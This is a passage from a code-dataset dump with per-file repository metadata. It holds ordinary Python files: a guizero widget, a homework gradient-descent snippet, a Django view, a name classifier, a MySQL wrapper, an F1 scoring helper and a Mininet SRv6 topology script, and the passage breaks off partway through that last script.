blob_id stringlengths 40 40 | directory_id stringlengths 40 40 | path stringlengths 2 616 | content_id stringlengths 40 40 | detected_licenses listlengths 0 69 | license_type stringclasses 2 values | repo_name stringlengths 5 118 | snapshot_id stringlengths 40 40 | revision_id stringlengths 40 40 | branch_name stringlengths 4 63 | visit_date timestamp[us] | revision_date timestamp[us] | committer_date timestamp[us] | github_id int64 2.91k 686M ⌀ | star_events_count int64 0 209k | fork_events_count int64 0 110k | gha_license_id stringclasses 23 values | gha_event_created_at timestamp[us] | gha_created_at timestamp[us] | gha_language stringclasses 220 values | src_encoding stringclasses 30 values | language stringclasses 1 value | is_vendor bool 2 classes | is_generated bool 2 classes | length_bytes int64 2 10.3M | extension stringclasses 257 values | content stringlengths 2 10.3M | authors listlengths 1 1 | author_id stringlengths 0 212 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ef27d001cfe1f15f1746179b07b5ffc8218bcbae | e3de9d0fe973060071470f4703e4edf8defc4b87 | /venv/lib/python3.8/site-packages/guizero/ButtonGroup.py | 57adb4fc0d2e4e6cff66d3d09e0f9b5b4b4c23e2 | [] | no_license | nhannguyengithub/emoji_game.py | 62ed14efb76118b77a11be6077e0554907cfc431 | f78a77a8283591ea3b1f230a19d19c5e7ea62bf1 | refs/heads/master | 2023-06-30T07:23:54.803480 | 2021-07-27T22:38:04 | 2021-07-27T22:38:04 | 390,146,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,388 | py | from tkinter import Frame, StringVar
from . import utilities as utils
from .base import ContainerTextWidget
from .tkmixins import TextMixin
from .RadioButton import RadioButton
from .event import EventManager
class ButtonGroup(ContainerTextWidget):
def __init__(
self,
master,
options=[],
selected=None,
horizontal=False,
command=None,
grid=None,
align=None,
args=None,
visible=True,
enabled=None,
width=None,
height=None):
"""
Creates a ButtonGroup
:param Container master:
The Container (App, Box, etc) the ButtonGroup will belong too.
:param List option:
A list of options to append to the ButtonGroup. If a 2D list is
specified, the first element is the text, the second is the value,
defaults to an empty list.
:param string selected:
The item in the ButtonGroup to select, defaults to `None`.
:param string horizontal:
If the ButtonGroup is to be displayed horizontally, defaults to
`True`.
:param Callable command:
The callback function to call when the ButtonGroup changes,
defaults to `None`.
:param List grid:
Grid co-ordinates for the widget, required if the master layout
is 'grid', defaults to `None`.
:param string align:
How to align the widget within the grid, defaults to None.
:param callback args:
A list of arguments to pass to the widgets `command`, defaults to
`None`.
:param bool visible:
If the widget should be visible, defaults to `True`.
:param bool enabled:
If the widget should be enabled, defaults to `None`. If `None`
the value is inherited from the master.
:param int width:
The starting width of the widget. Defaults to `None` and will auto
size.
:param int height:
The starting height of the widget. Defaults to `None` and will auto
size.
"""
self._rbuttons = [] # List of RadioButton objects
self._text_size = None
self._font = None
self._horizontal = horizontal
# Create a Tk frame object to contain the RadioButton objects
tk = Frame(master.tk)
# Set (using StringVar set() method) the selected option **number**
self._selected = StringVar(master=tk.winfo_toplevel())
# ButtonGroup uses "grid" internally to sort the RadioButtons
super(ButtonGroup, self).__init__(master, tk, "grid", grid, align, visible, enabled, width, height)
# Loop through the list given and setup the options
self._options = []
for option in options:
self._options.append(self._parse_option(option))
self._refresh_options()
# set the initial value
if selected is None and len(self._options) > 0:
self.value = self._options[0][1]
else:
self.value = selected
# Add a command if there was one
self.update_command(command, args)
# override the event manager and associate the button group and the
# radio buttons to it
option_tks = [option.tk for option in self._rbuttons]
self._events = EventManager(self, self.tk, *option_tks)
# now the ButtonGroup is populate it, size it
self.resize(width, height)
def _parse_option(self, option):
# If only a 1D was provided, use the text value as a key
if not isinstance(option, list):
return [option, option]
else:
return [option[0], option[1]]
def _refresh_options(self):
# destroy any existing radio buttons
for button in self._rbuttons:
button.destroy()
self._rbuttons = []
gridx = 0
gridy = 0
for button in self._options:
# Which way the buttons go
if self._horizontal:
gridx += 1
else:
gridy += 1
# Create a radio button object
rbutton = RadioButton(
self,
text=str(button[0]),
value=str(button[1]),
variable=self._selected,
grid=[gridx, gridy],
align="left",
visible=self.visible,
enabled=self.enabled)
# Add this radio button to the internal list
self._rbuttons.append(rbutton)
# Set the callback
rbutton.tk.config(command=self._command_callback)
# PROPERTIES
# -----------------------------------
# Gets the selected value (1, 2, 3 etc.)
@property
def value(self):
"""
Sets or returns the option selected in a ButtonGroup.
"""
return (self._selected.get())
# Sets which option is selected (if it doesn't exist, nothing is selected)
@value.setter
def value(self, value):
self._selected.set(str(value))
# Gets the text of the currently selected option
@property
def value_text(self):
"""
Sets or returns the option selected in a ButtonGroup by its text value.
"""
search = self._selected.get() # a string containing the selected option
# This is a bit nasty - suggestions welcome
for item in self._rbuttons:
if item.value == search:
return item.text
return ""
# Selects the option for the value_text provided
@value_text.setter
def value_text(self, value):
for item in self._rbuttons:
if item.text == value:
self.value = item.value
def resize(self, width, height):
"""
Resizes the widget.
:param int width:
The width of the widget.
:param int height:
The height of the widget.
"""
self._width = width
self._height = height
# update radio buttons width
for item in self._rbuttons:
item.width = width
# update radio buttons height
if len(self._rbuttons) > 0:
# work out the height of a button
button_height = height
if isinstance(height, int):
if height % len(self._rbuttons) != 0:
# if the height doesnt divide by the number of radio buttons give a warning
button_height = int(round(height / len(self._rbuttons)))
new_height = button_height * len(self._rbuttons)
utils.error_format("ButtonGroup height '{}' doesn't divide by the number of buttons '{}' setting height to '{}'.".format(height, len(self._rbuttons), new_height))
else:
button_height = int(height / len(self._rbuttons))
for item in self._rbuttons:
item.height = button_height
super(ButtonGroup, self).resize(width, height)
@property
def options(self):
"""
Returns a list of options in the ButtonGroup
"""
return self._options
@property
def description(self):
"""
Returns the description for the widget.
"""
return "[ButtonGroup] object with selected option '{}'".format(self.value)
# METHODS
# -----------------------------------
def append(self, option):
"""
Appends a new `option` to the end of the ButtonGroup.
:param string/List option:
The option to append to the ButtonGroup. If a 2D list is specified,
the first element is the text, the second is the value.
"""
self._options.append(self._parse_option(option))
self._refresh_options()
self.resize(self._width, self._height)
def insert(self, index, option):
"""
Insert a new `option` in the ButtonGroup at `index`.
:param int option:
The index of where to insert the option.
:param string/List option:
The option to append to the ButtonGroup. If a 2D list is specified,
the first element is the text, the second is the value.
"""
self._options.insert(index, self._parse_option(option))
self._refresh_options()
self.resize(self._width, self._height)
def remove(self, option):
"""
Removes the first `option` from the ButtonGroup.
Returns `True` if an item was removed.
:param string option:
The value of the option to remove from the ButtonGroup.
"""
for existing_option in self._options:
if existing_option[1] == option:
self._options.remove(existing_option)
self._refresh_options()
return True
return False
def clear(self):
"""
Clears all the options in a Combo
"""
self._options = []
self._refresh_options()
self.value = ""
# To help with debugging - return list of text/value pairs
def get_group_as_list(self):
return [[option.text, option.value] for option in self._rbuttons]
def update_command(self, command, args=None):
"""
Updates the callback command which is called when the ButtonGroup
changes.
Setting to `None` stops the callback.
:param Callable command:
The callback function to call.
:param callback args:
A list of arguments to pass to the widgets `command`, defaults to
`None`.
"""
if command is None:
self._command = lambda: None
else:
if args is None:
self._command = command
else:
self._command = utils.with_args(command, *args)
def _command_callback(self):
self._command()
| [
"ntnhan.hk@gmail.com"
] | ntnhan.hk@gmail.com |
5bd653bae84debbeefe7b946c6c94548d75f2cd1 | 8d03c3d4768ba866210b21aba3d8177984bfde3a | /Applications/OneDrive/文档/UT/2019 Winter/CSC411/HW3/q1.py | 829a5f30769a6fffd369cbf54c53b6deeed16e3e | [] | no_license | JimmyWen511/b58FinalProject | 3fa313d9f5c3547bc25fe67a0da870efef04dad5 | 900f4ab63ca37e723661045b3a8a830bd888b85d | refs/heads/master | 2021-01-18T16:47:36.298721 | 2019-02-08T15:52:21 | 2019-02-08T15:52:21 | 86,769,014 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 597 | py | import numpy as np
def gradient_descent(X, y, lr, num_iter, delta):
w = np.zeros((len(X[1]), 1))
b = 10
for i in range(num_iter):
y_predict = np.dot(X, w) + b
alpha = y_predict - y
dloss = np.where(np.abs(alpha) <= delta, alpha, delta * np.sign(alpha))
dw = np.dot(np.transpose(X), dloss)
db = np.mean(dloss)
w = w - lr * dw
b = b - lr * db
return w, b
N = 10
D = 5
X = np.zeros((N, D))
y = np.zeros((N, 1))
delta = 1.
lr = 1
dw, db = gradient_descent(X, y, lr, 1000, delta)
print(dw)
print(db)
| [
"wenming.lu@mail.utoronto.ca"
] | wenming.lu@mail.utoronto.ca |
7c6973701596621ef379cf527d1b3b1047184f0a | dc06008809d6257d024d0673107ef69a2c6151cb | /accounts/views.py | d27341fafaa08734a453072ffc9694b9edf75b59 | [] | no_license | K3vwe/BLog-Application | 1526b71322167302f4e9a2cee45c0a4c70847143 | 12a31b60f9da3e2615871d57a00322db67efbc24 | refs/heads/main | 2022-12-24T12:43:05.495484 | 2020-10-05T20:32:38 | 2020-10-05T20:32:38 | 301,538,116 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 333 | py | from django.shortcuts import render
from django.contrib.auth.forms import UserCreationForm
from django.urls import reverse_lazy
from django.views import generic
# Create your views here.
class SignUpView(generic.CreateView):
form_class = UserCreationForm
success_url = reverse_lazy('login')
template_name = 'signup.html' | [
"rukkimax@gmail.com"
] | rukkimax@gmail.com |
32d5dcf040bbe38413b58e6d2302d1d574012652 | d518dc5a84a018b0c704886d7b0e1a63e71d65c1 | /nytimes/settings.py.template.py | bd7dd1ca165d6b3807ca024d673c7355a57d5be6 | [
"Apache-2.0"
] | permissive | ljvillanueva/data_download | 1b0ac84bef43483a548ded86c832feab7d4c219a | 073878bf849700d928d8c3a044a3a6d1e982336e | refs/heads/master | 2022-12-10T08:43:25.071371 | 2020-09-05T17:30:57 | 2020-09-05T17:30:57 | 258,795,160 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12 | py | nytpath = "" | [
"villanueval@si.edu"
] | villanueval@si.edu |
788e90f3a30b4c82f945b157818a5ac3cd85e728 | c09b440f329c12fcaefe3484317eaec1b7d8f137 | /src/main.py | d68b4fc7a833d3822670a793ec5f0e2c07b89660 | [] | no_license | kyosek/name-classifier | a96f5c54fc32800c3e76816a965a4919d51c4160 | 56343f8a4bf637e78a5282598087403b8a1eb5cf | refs/heads/master | 2023-03-18T08:59:28.296446 | 2021-03-19T23:36:30 | 2021-03-19T23:36:30 | 349,576,068 | 0 | 0 | null | 2021-03-19T23:36:31 | 2021-03-19T23:02:26 | Jupyter Notebook | UTF-8 | Python | false | false | 2,527 | py | import argparse
import logging
import pickle
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from modules.transform.preprocess import cleanNames
from modules.train.train import trainNaiveBayes, saveModel
logging.basicConfig(
format="%(asctime)s --- %(levelname)s --- %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
level=logging.INFO,
)
logger = logging.getLogger(__name__)
def main(train_required=True):
"""main function
Args:
train_required (bool, optional):
if True, it will start the training
process.
if False, it will load the trained model
from "resources/models/bn_clf.pickle.
Defaults to True.
Process:
1. Load the data
2. Preprocess the text
3. Split the data into train and test
4. if train_required == 'False'
Load the trained model
4. if train_required == 'True'
Train and save the model
5. Make predictions
6. Evaluate the model
7. Complete the process
"""
logging.info("Loading data")
df = pd.read_csv("resources/data/data.csv")
logging.info("Preprocess the names")
df['cleaned_name'] = df['Name'].apply(lambda x: cleanNames(x))
logging.info("Splitting the dataset")
X_train, X_test, y_train, y_test = train_test_split(df["cleaned_name"], df["Class"], test_size=.3, random_state=42)
if train_required == "False":
logging.info("Loading the model")
clf = pickle.load(open("resources/models/nb_model.pkl","rb"))
elif train_required == "True":
logging.info("Start training the model")
clf = trainNaiveBayes(X_train, y_train)
saveModel(clf)
else:
logging.info("Please enter the argument 'train_required' either True or False")
exit()
logging.info("Making predictions")
predictions = clf.predict(X_test)
logging.info("Evaluating the model performance")
logging.info("Accuracy on the test set is " +
str(round(accuracy_score(y_test, predictions),4)))
logging.info("Process completed successfully")
if __name__ == "__main__":
parser = argparse.ArgumentParser("Name classification")
parser.add_argument("train_required", type=str, help="wether want to train")
args = parser.parse_args()
main(args.train_required)
| [
"kyosuke1029@icloud.com"
] | kyosuke1029@icloud.com |
cea9ae785ef6a31a24ff306dd44bd8cb277f1816 | f082f9e3553578ba57e47311994c75f067143abc | /Unit_digit_value.py | dc5d46c677b275a992dff4ff459bac3cb375e05c | [] | no_license | Mbonea-Mjema/random-python-scripts- | 1c9ec17e5145e6d3c2adab5ef0509e10874f5198 | 1f116a729b77e0846321c7be8455f53cfd8df77d | refs/heads/master | 2020-03-11T07:17:13.400683 | 2018-05-06T22:27:23 | 2018-05-06T22:27:23 | 129,853,079 | 0 | 0 | null | 2020-02-04T20:40:37 | 2018-04-17T05:53:02 | Python | UTF-8 | Python | false | false | 481 | py | '''
unit place values
By mbonea mjema
'''
Numbers={}
#importing prettyprint
import pprint
pp=pprint.PrettyPrinter(indent=4)
for num in range(10):
container=[]
temp_list=[]
for i in range (1,10,1):
unit_place_value=(num**i)%10
if(not unit_place_value in temp_list):
temp_list.append(unit_place_value)
container.append((i,unit_place_value))
else:
break
Numbers[num]=container
pp.pprint(Numbers)
| [
"mjema86@gmail.com"
] | mjema86@gmail.com |
fd5a05d0ceb01e4ed7cbca40b447b506540c68c1 | bcf99042596397b1b58dc9e175855802dcfb8a1c | /HomePage/MySQLUtil.py | fc9543169daed04392dfbe9bd2142cf64dc8e618 | [] | no_license | sdgdsffdsfff/WorkJean | 3775500383121e92b191f29e79540cf85460ee5b | ed9b887c351b4dc155e14c068e2331b7802e3af4 | refs/heads/master | 2020-12-25T09:37:34.725698 | 2015-01-05T07:16:23 | 2015-01-05T07:16:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,211 | py | # -*- coding:utf-8 -*-
#
# Copyright 2009 Facebook
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""A lightweight wrapper around MySQLdb."""
import copy
import itertools
import logging
import time
import MySQLdb.constants
import MySQLdb.converters
import MySQLdb.cursors
class Connection(object):
"""A lightweight wrapper around MySQLdb DB-API connections.
The main value we provide is wrapping rows in a dict/object so that
columns can be accessed by name. Typical usage::
db = database.Connection("localhost", "mydatabase")
for article in db.query("SELECT * FROM articles"):
print article.title
Cursors are hidden by the implementation, but other than that, the methods
are very similar to the DB-API.
We explicitly set the timezone to UTC and the character encoding to
UTF-8 on all connections to avoid time zone and encoding errors.
"""
def __init__(self, host, database, user=None, password=None, port=None, max_idle_time=7*3600):
self.host = host
self.database = database
self.max_idle_time = max_idle_time
args = dict(conv=CONVERSIONS, use_unicode=True, charset="utf8", db=database)
if user is not None:
args["user"] = user
if password is not None:
args["passwd"] = password
if port is not None:
args["port"] = port
# We accept a path to a MySQL socket file or a host(:port) string
if "/" in host:
args["unix_socket"] = host
else:
self.socket = None
pair = host.split(":")
if len(pair) == 2:
args["host"] = pair[0]
args["port"] = int(pair[1])
else:
args["host"] = host
# args["port"] = 3306
self._db = None
self._db_args = args
self._last_use_time = time.time()
try:
self.reconnect()
except Exception:
logging.error("Cannot connect to MySQL on %s", self.host,exc_info=True)
def __del__(self):
self.close()
def close(self):
"""Closes this database connection."""
if getattr(self, "_db", None) is not None:
self._db.close()
self._db = None
def reconnect(self):
"""Closes the existing database connection and re-opens it."""
self.close()
try:
from DBUtils import PooledDB
pool_con = PooledDB.PooledDB(creator=MySQLdb, mincached=1, maxcached=10, maxshared=10,
maxconnections=20, blocking=False, maxusage=100, **self._db_args)
self._db = pool_con.connection()
self._db.cursor().connection.autocommit(True)
except:
self._db = MySQLdb.connect(**self._db_args)
self._db.autocommit(True)
def iter(self, query, *parameters):
"""Returns an iterator for the given query and parameters."""
self._ensure_connected()
cursor = MySQLdb.cursors.SSCursor(self._db)
try:
self._execute(cursor, query, parameters)
column_names = [d[0] for d in cursor.description]
for row in cursor:
yield Row(zip(column_names, row))
finally:
cursor.close()
def query(self, query, *parameters):
"""Returns a row list for the given query and parameters."""
cursor = self._cursor()
try:
self._execute(cursor, query, parameters)
column_names = [d[0] for d in cursor.description]
return [Row(itertools.izip(column_names, row)) for row in cursor]
finally:
cursor.close()
def get(self, query, *parameters):
"""Returns the first row returned for the given query."""
rows = self.query(query, *parameters)
if not rows:
return None
elif len(rows) > 1:
raise Exception("Multiple rows returned for Database.get() query")
else:
return rows[0]
# rowcount is a more reasonable default return value than lastrowid,
# but for historical compatibility execute() must return lastrowid.
def execute(self, query, *parameters):
"""Executes the given query, returning the lastrowid from the query."""
return self.execute_lastrowid(query, *parameters)
def execute_lastrowid(self, query, *parameters):
"""Executes the given query, returning the lastrowid from the query."""
cursor = self._cursor()
try:
self._execute(cursor, query, parameters)
return cursor.lastrowid
finally:
cursor.close()
def execute_rowcount(self, query, *parameters):
"""Executes the given query, returning the rowcount from the query."""
cursor = self._cursor()
try:
self._execute(cursor, query, parameters)
return cursor.rowcount
finally:
cursor.close()
def executemany(self, query, parameters):
"""Executes the given query against all the given param sequences.
We return the lastrowid from the query.
"""
return self.executemany_lastrowid(query, parameters)
def executemany_lastrowid(self, query, parameters):
"""Executes the given query against all the given param sequences.
We return the lastrowid from the query.
"""
cursor = self._cursor()
try:
cursor.executemany(query, parameters)
return cursor.lastrowid
finally:
cursor.close()
def executemany_rowcount(self, query, parameters):
"""Executes the given query against all the given param sequences.
We return the rowcount from the query.
"""
cursor = self._cursor()
try:
cursor.executemany(query, parameters)
return cursor.rowcount
finally:
cursor.close()
def _ensure_connected(self):
# Mysql by default closes client connections that are idle for
# 8 hours, but the client library does not report this fact until
# you try to perform a query and it fails. Protect against this
# case by preemptively closing and reopening the connection
# if it has been idle for too long (7 hours by default).
if (self._db is None or
(time.time() - self._last_use_time > self.max_idle_time)):
self.reconnect()
self._last_use_time = time.time()
def _cursor(self):
self._ensure_connected()
return self._db.cursor()
def _execute(self, cursor, query, parameters):
try:
return cursor.execute(query, parameters)
except OperationalError:
logging.error("Error connecting to MySQL on %s", self.host)
self.close()
raise
finally:
cursor.close()
class Row(dict):
"""A dict that allows for object-like property access syntax."""
def __getattr__(self, name):
try:
return self[name]
except KeyError:
raise AttributeError(name)
# Fix the access conversions to properly recognize unicode/binary
FIELD_TYPE = MySQLdb.constants.FIELD_TYPE
FLAG = MySQLdb.constants.FLAG
CONVERSIONS = copy.copy(MySQLdb.converters.conversions)
field_types = [FIELD_TYPE.BLOB, FIELD_TYPE.STRING, FIELD_TYPE.VAR_STRING]
if 'VARCHAR' in vars(FIELD_TYPE):
field_types.append(FIELD_TYPE.VARCHAR)
for field_type in field_types:
CONVERSIONS[field_type] = [(FLAG.BINARY, str)] + CONVERSIONS[field_type]
# Alias some common MySQL exceptions
IntegrityError = MySQLdb.IntegrityError
OperationalError = MySQLdb.OperationalError
| [
"shen_jl@Ctrip.com"
] | shen_jl@Ctrip.com |
ba54ef7ffb1baac0a542ab9205ad64cd67fc1ec1 | 49bb27ea1ed99dbc9a68aad82e5be186e08c0207 | /f1ftw/calculate_progression.py | a16527c02ed53b5b12a8dc356b297da20fcc1306 | [] | no_license | JamesScanlan/f1ftw | e96b3cb1a063316a5681df97a18ad9d6a5e85552 | 5969b34fbbade05f4eda18bb27d21ed1435c5961 | refs/heads/master | 2023-08-09T17:55:27.484932 | 2023-07-31T22:35:15 | 2023-07-31T22:35:15 | 110,609,761 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import objects
def calculate_progression_score(race_team, race_results, drivers_championship):
progression_score = 0
for race_result in [r for r in race_results if r.driver.team == race_team]:
driver_championship_index = drivers_championship.get_ranking(race_result.driver)
start_position = race_result.grid
end_position = race_result.position
progression_score += (start_position - end_position) * driver_championship_index
return progression_score
def calculate_progression_scores(predictions, results, drivers_championship):
calculated_results=[]
for prediction in predictions:
progression_score = calculate_progression_score(prediction.progression_prediction, results.race_results, drivers_championship)
result = objects.calculation_score_results.CalculationScoreResult(prediction.predictor, progression_score)
result.log = "For " + str(prediction.predictor) + " team progression score for " + str(prediction.progression_prediction) + " = " + str(progression_score) + " points"
calculated_results.append(result)
calculated_scores = objects.calculation_score_results.CalculationScoreResults(objects.grand_prix_stages.GrandPrixStages.PROGRESSION)
calculated_scores.results = calculated_results
return calculated_scores
| [
"djamesscanlan@gmail.com"
] | djamesscanlan@gmail.com |
481dc9bb944ff3f959e0bcc63adc027ad0de60b1 | 54bf4a3a1820e62cd9c86978167eb71324c174d7 | /nets-in-progress/ditella-8r-1c-srv6-pm/isis8d.py.backup | b30fe257f0373427c075a53c8dd18c9114b31bf3 | [
"Apache-2.0"
] | permissive | huangoldman/rose-srv6-tutorial | 7ef90379031e73c376d6172425477b83310fc313 | 30a7ed46ba0efa050ca6d76a5a608d9b7b7aadad | refs/heads/master | 2023-08-18T23:14:23.907140 | 2021-10-05T18:18:59 | 2021-10-05T18:18:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,531 | backup | #!/usr/bin/python
# pylint: disable=missing-module-docstring
# pylint: disable=missing-function-docstring
# pylint: disable=missing-class-docstring
import os
import shutil
import sys
from argparse import ArgumentParser
import python_hosts
from dotenv import load_dotenv
from mininet.cli import CLI
# from mininet.link import Link
from mininet.log import setLogLevel
from mininet.net import Mininet
# from mininet.topo import Topo
from mininet.node import Host, OVSBridge
from mininet.util import dumpNodeConnections
from time import sleep
# BASEDIR = "/home/user/mytests/ospf3routers/nodeconf/"
BASEDIR = os.getcwd() + "/nodeconf/"
OUTPUT_PID_TABLE_FILE = "/tmp/pid_table_file.txt"
PRIVDIR = '/var/priv'
# Path of the file containing the entries (ip-hostname)
# to be added to /etc/hosts
ETC_HOSTS_FILE = './etc-hosts'
# Define whether to add Mininet nodes to /etc/hosts file or not
ADD_ETC_HOSTS = True
# Define whether to start the node managers on the routers or not
START_NODE_MANAGERS = False
# Load environment variables from .env file
load_dotenv()
# Get node manager path
NODE_MANAGER_PATH = os.getenv('NODE_MANAGER_PATH', None)
if NODE_MANAGER_PATH is not None:
NODE_MANAGER_PATH = os.path.join(NODE_MANAGER_PATH,
'srv6_manager.py')
# Get gRPC server port
NODE_MANAGER_GRPC_PORT = os.getenv('NODE_MANAGER_GRPC_PORT', None)
# Castagnacci-Ditella Progetto
# GLobal Variables
choosed_sender = ''
choosed_reflector = ''
# -----------------------------
class BaseNode(Host):
def __init__(self, name, *args, **kwargs):
dirs = [PRIVDIR]
Host.__init__(self, name, privateDirs=dirs, *args, **kwargs)
self.dir = "/tmp/%s" % name
self.nets = []
if not os.path.exists(self.dir):
os.makedirs(self.dir)
def config(self, **kwargs):
# pylint: disable=arguments-differ
# Init steps
Host.config(self, **kwargs)
# Iterate over the interfaces
# first = True
for intf in self.intfs.values():
# Remove any configured address
self.cmd('ifconfig %s 0' % intf.name)
# # For the first one, let's configure the mgmt address
# if first:
# first = False
# self.cmd('ip a a %s dev %s' %(kwargs['mgmtip'], intf.name))
# let's write the hostname in /var/mininet/hostname
self.cmd("echo '" + self.name + "' > " + PRIVDIR + "/hostname")
if os.path.isfile(BASEDIR + self.name + "/start.sh"):
self.cmd('source %s' % BASEDIR + self.name + "/start.sh")
def cleanup(self):
def remove_if_exists(filename):
if os.path.exists(filename):
os.remove(filename)
Host.cleanup(self)
# Rm dir
if os.path.exists(self.dir):
shutil.rmtree(self.dir)
remove_if_exists(BASEDIR + self.name + "/zebra.pid")
remove_if_exists(BASEDIR + self.name + "/zebra.log")
remove_if_exists(BASEDIR + self.name + "/zebra.sock")
remove_if_exists(BASEDIR + self.name + "/isis8d.pid")
remove_if_exists(BASEDIR + self.name + "/isis8d.log")
remove_if_exists(BASEDIR + self.name + "/isisd.log")
remove_if_exists(BASEDIR + self.name + "/isisd.pid")
remove_if_exists(OUTPUT_PID_TABLE_FILE)
# if os.path.exists(BASEDIR+self.name+"/zebra.pid"):
# os.remove(BASEDIR+self.name+"/zebra.pid")
# if os.path.exists(BASEDIR+self.name+"/zebra.log"):
# os.remove(BASEDIR+self.name+"/zebra.log")
# if os.path.exists(BASEDIR+self.name+"/zebra.sock"):
# os.remove(BASEDIR+self.name+"/zebra.sock")
# if os.path.exists(BASEDIR+self.name+"/ospfd.pid"):
# os.remove(BASEDIR+self.name+"/ospfd.pid")
# if os.path.exists(BASEDIR+self.name+"/ospfd.log"):
# os.remove(BASEDIR+self.name+"/ospfd.log")
# if os.path.exists(OUTPUT_PID_TABLE_FILE):
# os.remove(OUTPUT_PID_TABLE_FILE)
class Router(BaseNode):
def __init__(self, name, *args, **kwargs):
BaseNode.__init__(self, name, *args, **kwargs)
def config(self, **kwargs):
# pylint: disable=arguments-differ
# Init steps
BaseNode.config(self, **kwargs)
# Start node managers
if START_NODE_MANAGERS:
self.cmd('python %s --grpc-port %s &'
% (NODE_MANAGER_PATH, NODE_MANAGER_GRPC_PORT))
class Switch(OVSBridge):
def __init__(self, name, *args, **kwargs):
# dirs = [PRIVDIR]
OVSBridge.__init__(self, name, *args, **kwargs)
self.dir = "/tmp/%s" % name
self.nets = []
if not os.path.exists(self.dir):
os.makedirs(self.dir)
def config(self, **kwargs):
# pylint: disable=arguments-differ
# Init steps
OVSBridge.config(self, **kwargs)
# Iterate over the interfaces
for intf in self.intfs.values():
# Remove any configured address
self.cmd('ifconfig %s 0' % intf.name)
# # For the first one, let's configure the mgmt address
# if first:
# first = False
# self.cmd('ip a a %s dev %s' %(kwargs['mgmtip'], intf.name))
# let's write the hostname in /var/mininet/hostname
self.cmd("echo '" + self.name + "' > " + PRIVDIR + "/hostname")
if os.path.isfile(BASEDIR + self.name + "/start.sh"):
self.cmd('source %s' % BASEDIR + self.name + "/start.sh")
def cleanup(self):
# def remove_if_exists(filename):
# if os.path.exists(filename):
# os.remove(filename)
OVSBridge.cleanup(self)
# Rm dir
if os.path.exists(self.dir):
shutil.rmtree(self.dir)
# the add_link function creates a link and assigns the interface names
# as node1-node2 and node2-node1
def add_link(my_net, node1, node2):
my_net.addLink(node1, node2, intfName1=node1.name + '-' + node2.name,
intfName2=node2.name + '-' + node1.name)
def create_topo(my_net):
# pylint: disable=invalid-name, too-many-locals, too-many-statements
h11 = my_net.addHost(name='h11', cls=BaseNode)
h12 = my_net.addHost(name='h12', cls=BaseNode)
h13 = my_net.addHost(name='h13', cls=BaseNode)
h31 = my_net.addHost(name='h31', cls=BaseNode)
h32 = my_net.addHost(name='h32', cls=BaseNode)
h33 = my_net.addHost(name='h33', cls=BaseNode)
h51 = my_net.addHost(name='h51', cls=BaseNode)
h52 = my_net.addHost(name='h52', cls=BaseNode)
h53 = my_net.addHost(name='h53', cls=BaseNode)
h81 = my_net.addHost(name='h81', cls=BaseNode)
h82 = my_net.addHost(name='h82', cls=BaseNode)
h83 = my_net.addHost(name='h83', cls=BaseNode)
hdc1 = my_net.addHost(name='hdc1', cls=BaseNode)
hdc2 = my_net.addHost(name='hdc2', cls=BaseNode)
hdc3 = my_net.addHost(name='hdc3', cls=BaseNode)
controller = my_net.addHost(name='controller', cls=BaseNode,
sshd=False, inNamespace=False)
r1 = my_net.addHost(name='r1', cls=Router)
r2 = my_net.addHost(name='r2', cls=Router)
r3 = my_net.addHost(name='r3', cls=Router)
r4 = my_net.addHost(name='r4', cls=Router)
r5 = my_net.addHost(name='r5', cls=Router)
r6 = my_net.addHost(name='r6', cls=Router)
r7 = my_net.addHost(name='r7', cls=Router)
r8 = my_net.addHost(name='r8', cls=Router)
# note that if the interface names are not provided,
# the order of adding link will determine the
# naming of the interfaces (e.g. on r1: r1-eth0, r1-eth1, r1-eth2...)
# it is possible to provide names as follows
# Link(h1, r1, intfName1='h1-eth0', intfName2='r1-eth0')
# the add_link function creates a link and assigns the interface names
# as node1-node2 and node2-node1
# hosts of r1
add_link(my_net, h11, r1)
add_link(my_net, h12, r1)
add_link(my_net, h13, r1)
# r1 - r2
add_link(my_net, r1, r2)
# datacenters of r2
add_link(my_net, hdc1, r2)
# r2 - r3
add_link(my_net, r2, r3)
# r2 - r7
add_link(my_net, r2, r7)
# hosts of r3
add_link(my_net, h31, r3)
add_link(my_net, h32, r3)
add_link(my_net, h33, r3)
# r3 - r4
add_link(my_net, r3, r4)
# r4 - r5
add_link(my_net, r4, r5)
# r4 - r6
add_link(my_net, r4, r6)
# hosts of r5
add_link(my_net, h51, r5)
add_link(my_net, h52, r5)
add_link(my_net, h53, r5)
# datacenters of r5
add_link(my_net, hdc3, r5)
# r5 - r6
add_link(my_net, r5, r6)
# r6 - r7
add_link(my_net, r6, r7)
# r6 - r8
add_link(my_net, r6, r8)
# r7 - r8
add_link(my_net, r7, r8)
# hosts of r8
add_link(my_net, h81, r8)
add_link(my_net, h82, r8)
add_link(my_net, h83, r8)
# datacenters of r8
add_link(my_net, hdc2, r8)
# Create the mgmt switch
sw = my_net.addSwitch(name='sw', cls=Switch, dpid='1')
# Create a link between mgmt switch and controller
add_link(my_net, controller, sw)
# Connect all the routers to the management network
add_link(my_net, r1, sw)
add_link(my_net, r2, sw)
add_link(my_net, r3, sw)
add_link(my_net, r4, sw)
add_link(my_net, r5, sw)
add_link(my_net, r6, sw)
add_link(my_net, r7, sw)
add_link(my_net, r8, sw)
def add_nodes_to_etc_hosts():
# Get /etc/hosts
etc_hosts = python_hosts.hosts.Hosts()
# Import host-ip mapping defined in etc-hosts file
count = etc_hosts.import_file(ETC_HOSTS_FILE)
# Print results
count = count['add_result']['ipv6_count'] + \
count['add_result']['ipv4_count']
print('*** Added %s entries to /etc/hosts\n' % count)
